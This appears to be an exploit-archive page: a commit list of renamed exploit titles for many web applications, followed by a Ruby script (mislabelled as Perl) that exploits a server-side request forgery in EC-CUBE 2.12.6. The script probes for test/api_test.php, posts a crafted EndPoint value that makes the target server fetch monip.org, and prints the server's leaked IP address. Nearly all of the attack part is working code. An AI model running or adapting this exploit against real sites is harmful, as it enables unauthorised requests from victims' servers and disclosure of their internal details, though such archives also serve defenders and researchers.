8330920f32
4 new exploits ATutor 1.5.3.1 - (links) Blind SQL Injection ATutor 1.5.3.1 - 'links' Blind SQL Injection Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow WebPortal CMS 0.6.0 - (index.php m) SQL Injection WebPortal CMS 0.6.0 - 'index.php' SQL Injection samPHPweb - 'db.php commonpath' Remote File Inclusion samPHPweb 4.2.2 - 'db.php' Remote File Inclusion samPHPweb - 'songinfo.php' SQL Injection samPHPweb 4.2.2 - 'songinfo.php' SQL Injection ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion The Matt Wright Guestbook.pl 2.3.1 - Server Side Include The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include html2ps - 'include file' Server Side Include Directive Directory Traversal html2ps - 'include file' Server-Side Include Directive Directory Traversal ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit) Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit) Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion Weathermap 0.97c - 'mapname' Parameter Local File Inclusion ATutor 1.5.1 - password_reminder.php SQL Injection ATutor 1.5.1 - 'password_reminder.php' SQL Injection ATutor 1.x - forum.inc.php Arbitrary Command Execution ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion ATutor 1.x - print.php section Parameter Remote File Inclusion ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion ATutor 1.x - 'print.php' section Parameter Remote File Inclusion ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting Zimbra - Privilegie Escalation (via Local File Inclusion) Zimbra 2009-2013 - Local File Inclusion Zimbra Collaboration Server - Local File Inclusion (Metasploit) Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit) Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion Cart Engine 3.0.0 - (task.php) Local File Inclusion Cart Engine 3.0.0 - 'task.php' Local File Inclusion Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion Kemana Directory 1.5.6 - 'task.php' Local File Inclusion Railo - Remote File Inclusion (Metasploit) Railo 4.2.1 - Remote File Inclusion (Metasploit) LittleSite 0.1 - 'file' Parameter Local File Inclusion LittleSite 0.1 - 'index.php' Local File Inclusion OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion OSClass 3.4.1 - 'index.php' Local File Inclusion Magento Server MAGMI Plugin - Remote File Inclusion Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection) Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) u5CMS 3.9.3 - (thumb.php) Local File Inclusion u5CMS 3.9.3 - 'thumb.php' Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion ATutor - 'tool_file' Parameter Local File Inclusion openSIS 5.1 - 'ajax.php' Local File Inclusion ATutor 2.1 - 'tool_file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion Fork CMS - 'js.php' Local File Inclusion HP Insight Diagnostics - Local File Inclusion HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion phpVibe - Information Disclosure / Remote File Inclusion phpVibe 3.1 - Information Disclosure / Remote File Inclusion CakePHP - AssetDispatcher Class Local File Inclusion CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion TomatoCart - 'install/rpc.php' Local File Inclusion TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion NeoBill - /install/index.php language Parameter Traversal Local File Inclusion NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion iScripts AutoHoster - 'fname' Parameter Local File Inclusion iScripts AutoHoster - 'id' Parameter Local File Inclusion AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion AFCommerce - 'adblock.php' Remote File Inclusion AFCommerce - 'adminpassword.php' Remote File Inclusion AFCommerce - 'controlheader.php' Remote File Inclusion xBoard - 'post' Parameter Local File Inclusion xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion Rips Scanner 0.5 - (code.php) Local File Inclusion Rips Scanner 0.5 - 'code.php' Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion qEngine - 'run' Parameter Local File Inclusion qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery CMSimple - Remote file Inclusion CMSimple 4.4.4 - Remote file Inclusion VoipSwitch - 'action' Parameter Local File Inclusion VoipSwitch - 'user.php' Local File Inclusion Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062) EC-CUBE 2.12.6 - Server-Side Request Forgery Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management
89 lines
2.3 KiB
Perl
Executable file
89 lines
2.3 KiB
Perl
Executable file
# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
|
|
# Date: 22/10/16
|
|
# Exploit Author: Wad Deek
|
|
# Vendor Homepage: http://en.ec-cube.net/
|
|
# Software Link: http://en.ec-cube.net/download/
|
|
# Version: 2.12.6en-p1
|
|
# Tested on: Xampp on Windows7
|
|
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
|
|
##
|
|
##
|
|
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
require('mechanize')
|
|
agent = Mechanize.new()
|
|
agent.read_timeout = 3
|
|
agent.open_timeout = 3
|
|
agent.keep_alive = false
|
|
agent.redirect_ok = true
|
|
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
|
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
#===========================
|
|
urls = <<URLS
|
|
http://localhost/eccube/
|
|
URLS
|
|
urls.split("\n").each() do |url|
|
|
#===========================
|
|
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
|
|
def get(agent, target)
|
|
begin
|
|
response = agent.get(target)
|
|
code = response.code()
|
|
body = response.body()
|
|
rescue
|
|
else
|
|
return code, body
|
|
end
|
|
end
|
|
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
|
|
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
|
|
target = url+"test/api_test.php"
|
|
code, body = get(agent, target)
|
|
if(code == "200" && body.include?("EC-CUBE API TEST") == true)
|
|
begin
|
|
response = agent.post(
|
|
target,
|
|
{
|
|
"AccessKeyId" => 4111111111111111,
|
|
"arg_key0" => 1,
|
|
"arg_key1" => 1,
|
|
"arg_key2" => 1,
|
|
"arg_key3" => 1,
|
|
"arg_key4" => 1,
|
|
"arg_key5" => 1,
|
|
"arg_key6" => 1,
|
|
"arg_key7" => 1,
|
|
"arg_key8" => 1,
|
|
"arg_key9" => 1,
|
|
"arg_val0" => 1,
|
|
"arg_val1" => 1,
|
|
"arg_val2" => 1,
|
|
"arg_val3" => 1,
|
|
"arg_val4" => 1,
|
|
"arg_val5" => 1,
|
|
"arg_val6" => 1,
|
|
"arg_val7" => 1,
|
|
"arg_val8" => 1,
|
|
"arg_val9" => 1,
|
|
#????????????????????????????????????????????????????????????
|
|
"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
|
|
#????????????????????????????????????????????????????????????
|
|
"mode=" => "",
|
|
"Operation" => 1,
|
|
"SecretKey" => 1,
|
|
"Service" => 1,
|
|
"Signature" => 1,
|
|
"Timestamp" => 1,
|
|
"type" => "index.php"
|
|
})
|
|
body = response.body()
|
|
rescue
|
|
else
|
|
ip = response.body().scan(/IP : (.+?)</).join()
|
|
puts("[+] "+target+" >>>> monip.org >>>> "+ip)
|
|
end
|
|
end
|
|
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
|
|
#===========================
|
|
end
|
|
#===========================
|
|
|